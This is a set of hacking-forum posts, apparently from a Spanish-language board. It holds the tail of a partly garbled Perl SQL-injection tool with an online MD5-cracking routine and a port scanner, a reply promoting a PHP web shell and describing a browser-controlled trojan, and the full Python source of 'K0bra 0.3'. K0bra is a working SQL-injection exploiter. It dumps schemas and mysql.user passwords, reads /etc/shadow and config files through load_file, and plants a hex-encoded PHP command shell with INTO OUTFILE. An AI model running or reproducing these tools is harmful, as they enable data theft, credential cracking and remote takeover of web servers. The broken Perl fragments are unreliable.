@@ @ @ @ @ @@@@ @ @@ @ @ @ @ @ @ @ @@@@ @ @ @@@@@ @ @ @ @ @ @ @ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@@ @ @ @@@ @ @ @ @ @ @@@@ @@@ @ </pre> ); } sub logotres { <center> <pre> @@@@@ @ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@ @@ @ @@ @@ @ @ @ @@ @@@@ @@@ @@ @@@@@ @ @ @@ @ @ @ @@@@ @ @@ @ @ @ @ @ @ @ @@@@ @ @ @ @ @ @ @ @ @ @ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@@ @ @ @ @@ @ @ @ @ @@@@ @@@ @ </pre> ); } sub logocuatro { <center> <pre> @@@ @@@@ @ @ @@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@ @@@ @ @@ @ @@ @@@ @@ @@@ @ @ @ @ @@@ @ @ @ @@ @ @@ @ @ @ @ @ @ @ @ @ @ @ @@@@ @ @ @ @ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@ @@@@ @@@@@ @ @@@ @@@ @@@@ @ @ @ @ @@@ @ @ </pre> ); } sub logocinco { <center> <pre> @@@@@ @@@@ @ @ @@@ @ @ @ @@ @ @ @ @ @ @ @@ @ @ @ @ @ @@@@ @@@@ @ @ @ @ @ @ @@@@ @ @ @ @ @ @ @ @ @ @@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@ @ @ @ @@ @ @ @ @ @ @@ @ @ @ @@ @ @@@@ @@@@ @@@@ @ @ @@@ </pre> ); } sub logoseis { <center> <pre> @@@@@ @ @ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @@ @@@@ @@@ @@ @ @ @@@ @@ @@ @@@@ @ @@ @ @ @ @ @ @ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @@@@@ @ @ @@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@@ @@@ @ @ @@@@ @@ @@ </pre> ); } sub logosiete { <center> <pre> @@@@@ @@@ @ @ @ @ @ @ @ @ @ @ @ @@@ @@ @@ @ @@@ @@@ @ @@ @ @@ @@@ @@ @@@@@ @ @ @ @ @@@ @ @ @ @@ @ @@ @ @ @ @ @ @ @ @ @ @ @ @@@@ @ @ @ @ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@ @ @ @@@ @@@ @@@@ @ @ @ @ @@@ @ </pre> ); } sub copyright { qq(<br><br><br><br><br><br><br><center><a href =?home =true ><b>Return to home </b ></a ></center ><br><br>); } print "<br>[+] Looking for the number of columns<br><br>"; my $rows = "0"; my $asc; my $page = $_[0]; ( $pass1, $pass2 ) = &bypass( $_[1] ); $alert = "char(" . ascii("RATSXPDOWN1RATSXPDOWN") . ")"; $total = "1"; for my $rows ( 2 .. 200 ) { $asc .= "," . "char(" . 
ascii( "RATSXPDOWN" . $rows . "RATSXPDOWN" ) . ")"; $total .= "," . $rows; $injection = $page . "1" . $pass1 . "and" . $pass1 . "1=0" . $pass1 . "union" . $pass1 . "select" . $pass1 . $alert . $asc; $test = toma($injection); if ( $test =~ /RATSXPDOWN/ ) { @number = $test =~ m{RATSXPDOWN (\d+)RATSXPDOWN }g ; $control = 1; my ( $scheme, $auth, $path, $query, $frag ) = uri_split( $_[0] ); my $save = $auth; $total =~ s/$number[0]/hackman/; . $page . "1" . $pass1 . "and" . $pass1 . "1=0" . $pass1 . "union" . $pass1 . "select" . $pass1 . $total . "<br>"; details( $page . "1" . $pass1 . "and" . $pass1 . "1=0" . $pass1 . "union" . $pass1 . "select" . $pass1 . $total, "--", "" ); } } } sub details { my ( $page, $bypass, $save ) = @_; ( $pass1, $pass2 ) = &bypass($bypass); if ( $page =~ /(.*)hackman(.*)/ig ) { print "<br>[+] Searching information..<br><br>"; my ( $start, $end ) = ( $1, $2 ); $inforschema = $start . "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))" . $end . $pass1 . "from" . $pass1 . "information_schema.tables" . $pass2; $mysqluser = $start . "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))" . $end . $pass1 . "from" . $pass1 . "mysql.user" . $pass2; $test3 = toma( $start . "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))" . $end . $pass2 ); $test1 = toma($inforschema); $test2 = toma($mysqluser); if ( $test2 =~ /ERTOR854/ig ) { print "[mysql.user] : ON<br>"; } else { print "[mysql.user] : OFF<br>"; } if ( $test1 =~ /ERTOR854/ig ) { print "[information_schema.tables] : ON<br>"; } else { print "[information_schema.tables] : OFF<br>"; } if ( $test3 =~ /ERTOR854/ig ) { print "[load_file] : ON<br>"; } $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))"; $injection = $start . $concat . $end . $pass2; $code = toma($injection); if ( $code =~ /ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g ) { "<br>[!] 
DB Version : $1<br>[!] DB Name : $2<br>[!] user_name : $3<br><br>"; } else { print "<br>[-] Not found any data<br>"; } } } sub encode { my $string = $_[0]; $hex = '0x'; for ( split //, $string ) { } } sub bypass { if ( $_[0] eq "/*" ) { return ( "/**/", "/**/" ); } elsif ( $_[0] eq "%20" ) { return ( "%20", "%00" ); } else { return ( "+", "--" ); } } sub ascii { } sub toma { return $nave->get( $_[0] )->content; } sub tomax { } sub get_links { $test = HTML::LinkExtor->new( \&agarrar )->parse( $_[0] ); sub agarrar { my ( $a, %b ) = @_; } } sub crackit { my $secret = $_[0]; print "<br><br>[+] Cracking $_[0]<br><br>"; my %hash = ( 'http://passcracking.com/' => { 'tipo' => 'post', 'variables' => '{"datafromuser" => $_[0], "submit" => "DoIT"}', 'regex' => '<\/td><td>md5 Database<\/td><td>$_[0]<\/td><td bgcolor=#FF0000>(.*)<\/td><td>', }, 'http://md5.hashcracking.com/search.php?md5=' => { 'tipo' => 'get', 'regex' => 'Cleartext of $_[0] is (.*)', }, 'http://www.bigtrapeze.com/md5/' => { 'tipo' => 'post', 'variables' => '{"query" => $_[0], "submit" => " Crack "}', 'regex' => 'The hash <strong>$_[0]<\/strong> has been deciphered to: <strong>(.+)<\/strong>', }, 'http://opencrack.hashkiller.com/' => { 'tipo' => 'post', 'variables' => '{"oc_check_md5" => $_[0], "submit" => "Search MD5"}', 'regex' => qq(<\ /div ><div class ="result">$_[0]:(.+)<br\ />), }, 'http://www.hashchecker.com/index.php?_sls=search_hash' => { 'tipo' => 'post', 'variables' => '{"search_field" => $_[0], "Submit" => "search"}', 'regex' => '<td><li>Your md5 hash is :<br><li>$_[0] is <b>(.*)<\/b> used charl', }, 'http://victorov.su/md5/?md5e=&md5d=' => { 'tipo' => 'get', 'regex' => qq(MD5 ðàñøèôðîâàí : <b>(.*)<\ /b ><br><form action =\ "\">), } ); for my $data ( keys %hash ) { if ( $hash{$data}{tipo} eq "get" ) { $code = toma( $data . $_[0] ); if ( $code =~ /$hash{$data}{regex}/ig ) { print "<br>[+] Decoded : " . $1 . "<br><br>"; print $secret. ":" . $1 . 
"<br>"; } } else { $code = tomar( $data, $hash{$data}{variables} ); if ( $code =~ /$hash{$data}{regex}/ig ) { print $secret. ":" . $1 . "<br>"; } } } print "<br>[+] Finish<br>"; } sub tomar { my ( $web, $var ) = @_; return $nave->post( $web, [ %{$var} ] )->content; } sub scanuno { my %ports = ( "21" => "ftp", "22" => "ssh", "25" => "smtp", "80" => "http", "110" => "pop3", "3306" => "mysql" ); print "<br>[+] Scanning $_[0]<br><br><br>"; for my $port ( keys %ports ) { if ( new IO::Socket::INET( PeerAddr => $_[0], PeerPort => $port, Proto => "tcp", Timeout => 0.5 ) ) { print "[Port] : " . $port . " [Service] : " . $ports{$port} . "<br>"; } } print "<br><br>[+] Scan Finish<br>"; } # The End ?
Programación / Scripting / Re: [Perl] Commander
en: 9 Diciembre 2011, 15:06 pm
Yo hice una phpshell llamada PoisonShell; tiene lo que buscas, solo es cuestión de buscarla en Google. La versión 1.0 de mi shell está acá: http://pastebin.com/FM7j0w7N . Eso sí, si lo que buscas es algo como Commander pero que pida password, no te puedo ayudar, porque tendría que hacer una nueva versión de este programa. Otra cosa: espero que tengas en cuenta que Commander es solo un troyano que se maneja por navegador; no tiene nada que ver con phpshells como c99 o r57.
Programación / Scripting / [Python] K0bra 0.3
en: 3 Diciembre 2011, 16:35 pm
Un completo scanner SQLi hecho en Python. Las funciones son las siguientes: - Comprobar vulnerabilidad
- Buscar numero de columnas
- Buscar automaticamente el numero para mostrar datos
- Mostrar tablas
- Mostrar columnas
- Mostrar bases de datos
- Mostrar tablas de otra DB
- Mostrar columnas de una tabla de otra DB
- Mostrar usuarios de mysql.user
- Buscar archivos usando load_file
- Mostrar un archivo usando load_file
- Mostrar valores
- Mostrar informacion sobre la DB
- Crear una shell usando outfile
- Todo se guarda en logs ordenados
- Manejo de control+c
#!usr/bin/python #k0bra 0.3 (C) Doddy Hackman 2011 import os,sys,urllib2,re,binascii from urlparse import urlparse files = ["/etc/passwd","C:/xampp/htdocs/aca.txt","C:/xampp/htdocs/aca.txt","C:/xampp/htdocs/admin.php","C:/xampp/htdocs/leer.txt","../../../boot.ini","../../../../boot.ini","../../../../../boot.ini","../../../../../../boot.ini","/etc/shadow","/etc/shadow~","/etc/hosts","/etc/motd","/etc/apache/apache.conf","/etc/fstab","/etc/apache2/apache2.conf","/etc/apache/httpd.conf","/etc/httpd/conf/httpd.conf","/etc/apache2/httpd.conf","/etc/apache2/sites-available/default","/etc/mysql/my.cnf","/etc/my.cnf","/etc/sysconfig/network-scripts/ifcfg-eth0","/etc/redhat-release","/etc/httpd/conf.d/php.conf","/etc/pam.d/proftpd","/etc/phpmyadmin/config.inc.php","/var/www/config.php","/etc/httpd/logs/error_log","/etc/httpd/logs/error.log","/etc/httpd/logs/access_log","/etc/httpd/logs/access.log","/var/log/apache/error_log","/var/log/apache/error.log","/var/log/apache/access_log","/var/log/apache/access.log","/var/log/apache2/error_log","/var/log/apache2/error.log","/var/log/apache2/access_log","/var/log/apache2/access.log","/var/www/logs/error_log","/var/www/logs/error.log","/var/www/logs/access_log","/var/www/logs/access.log","/usr/local/apache/logs/error_log","/usr/local/apache/logs/error.log","/usr/local/apache/logs/access_log","/usr/local/apache/logs/access.log","/var/log/error_log","/var/log/error.log","/var/log/access_log","/var/log/access.log","/etc/group","/etc/security/group","/etc/security/passwd","/etc/security/user","/etc/security/environ","/etc/security/limits","/usr/lib/security/mkuser.default","/apache/logs/access.log","/apache/logs/error.log","/etc/httpd/logs/acces_log","/etc/httpd/logs/acces.log","/var/log/httpd/access_log","/var/log/httpd/error_log","/apache2/logs/error.log","/apache2/logs/access.log","/logs/error.log","/logs/access.log","/usr/local/apache2/logs/access_log","/usr/local/apache2/logs/access.log","/usr/local/apache2/logs/error_log","/usr/loc
al/apache2/logs/error.log","/var/log/httpd/access.log","/var/log/httpd/error.log","/opt/lampp/logs/access_log","/opt/lampp/logs/error_log","/opt/xampp/logs/access_log","/opt/xampp/logs/error_log","/opt/lampp/logs/access.log","/opt/lampp/logs/error.log","/opt/xampp/logs/access.log","/opt/xampp/logs/error.log","C:\\ProgramFiles\\ApacheGroup\\Apache\\logs\\access.log","C:\\ProgramFiles\\ApacheGroup\\Apache\\logs\\error.log","/usr/local/apache/conf/httpd.conf","/usr/local/apache2/conf/httpd.conf","/etc/apache/conf/httpd.conf","/usr/local/etc/apache/conf/httpd.conf","/usr/local/apache/httpd.conf","/usr/local/apache2/httpd.conf","/usr/local/httpd/conf/httpd.conf","/usr/local/etc/apache2/conf/httpd.conf","/usr/local/etc/httpd/conf/httpd.conf","/usr/apache2/conf/httpd.conf","/usr/apache/conf/httpd.conf","/usr/local/apps/apache2/conf/httpd.conf","/usr/local/apps/apache/conf/httpd.conf","/etc/apache2/conf/httpd.conf","/etc/http/conf/httpd.conf","/etc/httpd/httpd.conf","/etc/http/httpd.conf","/etc/httpd.conf","/opt/apache/conf/httpd.conf","/opt/apache2/conf/httpd.conf","/var/www/conf/httpd.conf","/private/etc/httpd/httpd.conf","/private/etc/httpd/httpd.conf.default","/Volumes/webBackup/opt/apache2/conf/httpd.conf","/Volumes/webBackup/private/etc/httpd/httpd.conf","/Volumes/webBackup/private/etc/httpd/httpd.conf.default","C:\\ProgramFiles\\ApacheGroup\\Apache\\conf\\httpd.conf","C:\\ProgramFiles\\ApacheGroup\\Apache2\\conf\\httpd.conf","C:\\ProgramFiles\\xampp\\apache\\conf\\httpd.conf","/usr/local/php/httpd.conf.php","/usr/local/php4/httpd.conf.php","/usr/local/php5/httpd.conf.php","/usr/local/php/httpd.conf","/usr/local/php4/httpd.conf","/usr/local/php5/httpd.conf","/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf","/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf","/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf","/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php","/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php","/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.p
hp","/usr/local/etc/apache/vhosts.conf","/etc/php.ini","/bin/php.ini","/etc/httpd/php.ini","/usr/lib/php.ini","/usr/lib/php/php.ini","/usr/local/etc/php.ini","/usr/local/lib/php.ini","/usr/local/php/lib/php.ini","/usr/local/php4/lib/php.ini","/usr/local/php5/lib/php.ini","/usr/local/apache/conf/php.ini","/etc/php4.4/fcgi/php.ini","/etc/php4/apache/php.ini","/etc/php4/apache2/php.ini","/etc/php5/apache/php.ini","/etc/php5/apache2/php.ini","/etc/php/php.ini","/etc/php/php4/php.ini","/etc/php/apache/php.ini","/etc/php/apache2/php.ini","/web/conf/php.ini","/usr/local/Zend/etc/php.ini","/opt/xampp/etc/php.ini","/var/local/www/conf/php.ini","/etc/php/cgi/php.ini","/etc/php4/cgi/php.ini","/etc/php5/cgi/php.ini","c:\\php5\\php.ini","c:\\php4\\php.ini","c:\\php\\php.ini","c:\\PHP\\php.ini","c:\\WINDOWS\\php.ini","c:\\WINNT\\php.ini","c:\\apache\\php\\php.ini","c:\\xampp\\apache\\bin\\php.ini","c:\\NetServer\\bin\\stable\\apache\\php.ini","c:\\home2\\bin\\stable\\apache\\php.ini","c:\\home\\bin\\stable\\apache\\php.ini","/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini","/usr/local/cpanel/logs","/usr/local/cpanel/logs/stats_log","/usr/local/cpanel/logs/access_log","/usr/local/cpanel/logs/error_log","/usr/local/cpanel/logs/license_log","/usr/local/cpanel/logs/login_log","/var/cpanel/cpanel.config","/var/log/mysql/mysql-bin.log","/var/log/mysql.log","/var/log/mysqlderror.log","/var/log/mysql/mysql.log","/var/log/mysql/mysql-slow.log","/var/mysql.log","/var/lib/mysql/my.cnf","C:\\ProgramFiles\\MySQL\\MySQLServer5.0\\data\\hostname.err","C:\\ProgramFiles\\MySQL\\MySQLServer5.0\\data\\mysql.log","C:\\ProgramFiles\\MySQL\\MySQLServer5.0\\data\\mysql.err","C:\\ProgramFiles\\MySQL\\MySQLServer5.0\\data\\mysql-bin.log","C:\\ProgramFiles\\MySQL\\data\\hostname.err","C:\\ProgramFiles\\MySQL\\data\\mysql.log","C:\\ProgramFiles\\MySQL\\data\\mysql.err","C:\\ProgramFiles\\MySQL\\data\\mysql-bin.log","C:\\MySQL\\data\\hostname.err","C:\\MySQL\\data\\mysql.log","C:\\MySQL\\data\\mysql.err","
C:\\MySQL\\data\\mysql-bin.log","C:\\ProgramFiles\\MySQL\\MySQLServer5.0\\my.ini","C:\\ProgramFiles\\MySQL\\MySQLServer5.0\\my.cnf","C:\\ProgramFiles\\MySQL\\my.ini","C:\\ProgramFiles\\MySQL\\my.cnf","C:\\MySQL\\my.ini","C:\\MySQL\\my.cnf","/etc/logrotate.d/proftpd","/www/logs/proftpd.system.log","/var/log/proftpd","/etc/proftp.conf","/etc/protpd/proftpd.conf","/etc/vhcs2/proftpd/proftpd.conf","/etc/proftpd/modules.conf","/var/log/vsftpd.log","/etc/vsftpd.chroot_list","/etc/logrotate.d/vsftpd.log","/etc/vsftpd/vsftpd.conf","/etc/vsftpd.conf","/etc/chrootUsers","/var/log/xferlog","/var/adm/log/xferlog","/etc/wu-ftpd/ftpaccess","/etc/wu-ftpd/ftphosts","/etc/wu-ftpd/ftpusers","/usr/sbin/pure-config.pl","/usr/etc/pure-ftpd.conf","/etc/pure-ftpd/pure-ftpd.conf","/usr/local/etc/pure-ftpd.conf","/usr/local/etc/pureftpd.pdb","/usr/local/pureftpd/etc/pureftpd.pdb","/usr/local/pureftpd/sbin/pure-config.pl","/usr/local/pureftpd/etc/pure-ftpd.conf","/etc/pure-ftpd/pure-ftpd.pdb","/etc/pureftpd.pdb","/etc/pureftpd.passwd","/etc/pure-ftpd/pureftpd.pdb","/var/log/pure-ftpd/pure-ftpd.log","/logs/pure-ftpd.log","/var/log/pureftpd.log","/var/log/ftp-proxy/ftp-proxy.log","/var/log/ftp-proxy","/var/log/ftplog","/etc/logrotate.d/ftp","/etc/ftpchroot","/etc/ftphosts","/var/log/exim_mainlog","/var/log/exim/mainlog","/var/log/maillog","/var/log/exim_paniclog","/var/log/exim/paniclog","/var/log/exim/rejectlog","/var/log/exim_rejectlog"] def installer(): try: os.mkdir("logs",0777) except: pass def clean(): if sys.platform=="win32": os.system("cls") else: os.system("clear") def savefile(name,text): file = open(name,"a") file.write("\n"+text) file.close() def gethost(test): return urlparse(test).netloc def header() : print "" print "" print " @ @@ @ " print "@@ @ @ @@ " print " @ @@ @ @ @ @ @ @ @@@ " print " @ @ @ @ @@ @ @@@ @ @ " print " @@ @ @ @ @ @ @@@ " print " @ @ @ @ @ @ @ @ @ " print "@@@ @ @@ @@@ @@@ @@@@@" print "" print "" def copyright() : print "\n\n(C) Doddy Hackman 2010\n" def 
show() : print "\n[*] Sintax : ",sys.argv[0]," <web>\n" def toma(web) : nave = urllib2.Request(web) nave.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5'); op = urllib2.build_opener() return op.open(nave).read() def bypass(bypass): if bypass == "--": return("+","--") elif bypass == "/*": return("/**/","/**/") else: return("+","--") def reiniciar(): copyright() raw_input() sta() def dumper(web,passx,table,col1,col2): pass1,pass2 = bypass(passx) web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web) web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,"+col1+",0x4b30425241,0x4B3042524131,"+col2+",0x4B3042524131)))",web) code1 = toma(web1+pass1+"from"+pass1+table+pass2) print "\n\n[+] Searching values\n\n" if (re.findall("K0BRA(.*?)K0BRA",code1)): numbers = re.findall("K0BRA(.*?)K0BRA",code1) numbers = numbers[0] savefile("logs/"+gethost(web)+".txt","") savefile("logs/"+gethost(web)+".txt","[+] Values Found in table "+table+" : "+numbers+"\n") print "[+] Values Found : ",numbers,"\n" for counter in range(0,int(numbers)): code2 = toma(web2+pass1+"from"+pass1+table+pass1+"limit"+pass1+repr(counter)+",1"+pass2) if (re.findall("K0BRA(.*?)K0BRA",code2)): c1 = re.findall("K0BRA(.*?)K0BRA",code2) c1 = c1[0] c2 = re.findall("K0BRA1(.*?)K0BRA1",code2) c2 = c2[0] print "["+col1+"] : "+c1 print "["+col2+"] : "+c2+"\n" savefile("logs/"+gethost(web)+".txt","["+col1+"] : "+c1) savefile("logs/"+gethost(web)+".txt","["+col2+"] : "+c2+"\n") else: print "[-] Not Found\n" def mysqluser(web,passx): pass1,pass2 = bypass(passx) web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web) web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))",web) code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2) print "\n\n[+] Searching mysql.user\n\n" if 
(re.findall("K0BRA(.*?)K0BRA",code1)): numbers = re.findall("K0BRA(.*?)K0BRA",code1) numbers = numbers[0] print "[+] mysql.user : ON" savefile("logs/"+gethost(web)+".txt","") savefile("logs/"+gethost(web)+".txt","[+] mysql.user : ON") savefile("logs/"+gethost(web)+".txt","[+] Users Found : "+numbers+"\n") print "[+] Users Found : ",numbers,"\n" for counter in range(0,int(numbers)): code2 = toma(web2+pass1+"from"+pass1+"mysql.user"+pass1+"limit"+pass1+repr(counter)+",1"+pass2) if (re.findall("K0BRA(.*?)K0BRA",code2)): host = re.findall("K0BRA(.*?)K0BRA",code2) host = host[0] user = re.findall("K0BRA1(.*?)K0BRA1",code2) user = user[0] passw = re.findall("K0BRA2(.*?)K0BRA2",code2) passw = passw[0] savefile("logs/"+gethost(web)+".txt","[Host] : "+host) savefile("logs/"+gethost(web)+".txt","[User] : "+user) savefile("logs/"+gethost(web)+".txt","[Pass] : "+passw+"\n") print "[Host] : "+host print "[User] : "+user print "[Pass] : "+passw+"\n" else: print "[-] Not Found\n" def showcolumnsdb(web,db,table,passx): db2 = db table2 = table db = "0x"+str(binascii.hexlify(db)) table = "0x"+str(binascii.hexlify(table)) pass1,pass2 = bypass(passx) savefile("logs/"+gethost(web)+".txt","") web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web) web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))",web) code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+table+pass1+"and"+pass1+"table_schema="+db+pass2) print "\n\n[+] Searching columns in DB\n\n" if (re.findall("K0BRA(.*?)K0BRA",code1)): numbers = re.findall("K0BRA(.*?)K0BRA",code1) numbers = numbers[0] print "[+] information_schema : ON" print "[+] Columns Found : ",numbers,"\n" for counter in range(0,int(numbers)): code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+table+pass1+"and"+pass1+"table_schema="+db+pass1+"limit"+pass1+repr(counter)+",1"+pass2) if 
(re.findall("K0BRA(.*?)K0BRA",code2)): column = re.findall("K0BRA(.*?)K0BRA",code2) column = column[0] savefile("logs/"+gethost(web)+".txt","[Column Found in table "+table2+" in DB "+table2+"] : "+column) print "[Column Found] : "+column else: print "[-] Not Found\n" def showtablesdb(web,db,passx): db2 = db db = "0x"+str(binascii.hexlify(db)) pass1,pass2 = bypass(passx) savefile("logs/"+gethost(web)+".txt","") web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web) web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))",web) code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+db+pass2) print "\n\n[+] Searching tables in DB\n\n" if (re.findall("K0BRA(.*?)K0BRA",code1)): numbers = re.findall("K0BRA(.*?)K0BRA",code1) numbers = numbers[0] print "[+] information_schema : ON" print "[+] Tables Found : ",numbers,"\n" for counter in range(0,int(numbers)): code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+db+pass1+"limit"+pass1+repr(counter)+",1"+pass2) if (re.findall("K0BRA(.*?)K0BRA",code2)): table = re.findall("K0BRA(.*?)K0BRA",code2) table = table[0] print "[Table Found] : "+table savefile("logs/"+gethost(web)+".txt","[Table Found in DB "+db2+"] : "+table) else: print "[-] Not Found\n" def showtables(web,passx): pass1,pass2 = bypass(passx) web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))",web) web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))",web) code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2) print "\n\n[+] Searching tables\n\n" if (re.findall("K0BRA(.*?)K0BRA",code1)): savefile("logs/"+gethost(web)+".txt","") numbers = re.findall("K0BRA(.*?)K0BRA",code1) numbers = numbers[0] print "[+] information_schema : ON" print "[+] Tables Found : ",numbers,"\n" for counter in range(17,int(numbers)): code2 = 
toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"limit"+pass1+repr(counter)+",1"+pass2) if (re.findall("K0BRA(.*?)K0BRA",code2)): table = re.findall("K0BRA(.*?)K0BRA",code2) table = table[0] print "[Table Found] : "+table savefile("logs/"+gethost(web)+".txt","[Table Found] : "+table) else: print "[-] Not Found\n" def showcolumns(tabla,web,passx): pass1,pass2 = bypass(passx) tabla2 = tabla tabla = "0x"+str(binascii.hexlify(tabla)) web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))",web) web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))",web) code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabla+pass2) print "\n\n[+] Searching columns\n\n" if (re.findall("K0BRA(.*?)K0BRA",code1)): savefile("logs/"+gethost(web)+".txt","") numbers = re.findall("K0BRA(.*?)K0BRA",code1) numbers = numbers[0] print "[+] information_schema : ON" print "[+] Columns Found : ",numbers,"\n" for counter in range(0,int(numbers)): code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabla+pass1+"limit"+pass1+repr(counter)+",1"+pass2) if (re.findall("K0BRA(.*?)K0BRA",code2)): column = re.findall("K0BRA(.*?)K0BRA",code2) column = column[0] print "[Column Found in table "+tabla2+"] : "+column savefile("logs/"+gethost(web)+".txt","[Column Found in table "+tabla2+"] : "+column) else: print "[-] Not Found\n" def showdbs(web,passx): pass1,pass2 = bypass(passx) web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web) web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))",web) code1 = toma(web1+pass1+"from"+pass1+"information_schema.schemata"+pass2) print "\n\n[+] Searching DBS\n\n" if (re.findall("K0BRA(.*?)K0BRA",code1)): savefile("logs/"+gethost(web)+".txt","") numbers = re.findall("K0BRA(.*?)K0BRA",code1) numbers = numbers[0] print "[+] information_schema : ON" 
print "[+] DBS Found : ",numbers,"\n" for counter in range(0,int(numbers)): code2 = toma(web2+pass1+"from"+pass1+"information_schema.schemata"+pass1+"limit"+pass1+repr(counter)+",1"+pass2) if (re.findall("K0BRA(.*?)K0BRA",code2)): db = re.findall("K0BRA(.*?)K0BRA",code2) db = db[0] print "[DB Found] : "+db savefile("logs/"+gethost(web)+".txt","[DB Found] : "+db) else: print "[-] Not Found\n" def men(): print "\n[+] Press any key to continue\n" raw_input() menu(page,bypass) def fuzz(web,bypassx): print "\n[+] Fuzzing files with load_file()\n" pass1,pass2 = bypass(bypassx) for archivos in files: nombre = archivos file = "0x"+str(binascii.hexlify(archivos)) web1 = re.sub("hackman","unhex(hex(concat(char(107,48,98,114,97),load_file("+file+"),char(107,48,98,114,97))))",web) code = toma(web1) if (re.findall("k0bra(.*?)k0bra",code,re.S)): algo = re.findall("k0bra(.*?)k0bra",code,re.S) print "\n[File Found] : ",nombre print "\n[Source Start]\n" print algo[0] print "\n[Source End]" savefile("logs/"+gethost(web)+".txt","\n[File Found] : "+nombre) savefile("logs/"+gethost(web)+".txt","\n[Source Start]\n") savefile("logs/"+gethost(web)+".txt",algo[0]) savefile("logs/"+gethost(web)+".txt","\n[Source End]") print "\n[+] Finished\n" def fuzzfile(web,bypassx): pass1,pass2 = bypass(bypassx) archivos = raw_input("\n[File To load] : ") nombre = archivos file = "0x"+str(binascii.hexlify(archivos)) web1 = re.sub("hackman","unhex(hex(concat(char(107,48,98,114,97),load_file("+file+"),char(107,48,98,114,97))))",web) code = toma(web1) if (re.findall("k0bra(.*?)k0bra",code,re.S)): algo = re.findall("k0bra(.*?)k0bra",code,re.S) print "\n\n[File Found] : ",nombre print "\n[Source Start]\n" print algo[0] print "\n[Source End]" savefile("logs/"+gethost(web)+".txt","\n[File Found] : "+nombre) savefile("logs/"+gethost(web)+".txt","\n[Source Start]\n") savefile("logs/"+gethost(web)+".txt",algo[0]) savefile("logs/"+gethost(web)+".txt","\n[Source End]") else: print "\n\n[-] Error" def 
into(web,passx): pass1,pass2 = bypass(passx) dira = raw_input("\n\n[Full Source Discloure] : ") diro = raw_input("\n[Directory to test] : ") linea= "0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e" lugar = dira+"/cmd.php" lugardos = diro+"/cmd.php" webtest = "http://"+gethost(web)+lugardos web1 = re.sub("hackman",linea,web) formandoweb = web1+pass1+"into"+pass1+"outfile"+pass1+"'"+lugar+"'"+pass2 toma(formandoweb) code = toma(webtest) if (re.findall("Mini Shell By Doddy",code)): print "\n\n[shell up] : "+webtest savefile("logs/"+gethost(web)+".txt","\n[shell up] : "+webtest) else: print "\n\n[-] Error" def menu(page,bypass): clean() header() print "\n[+] Target : ",page,"\n" print "\n[information_schema]\n" print "1 - Show tables" print "2 - Show columns of the a table" 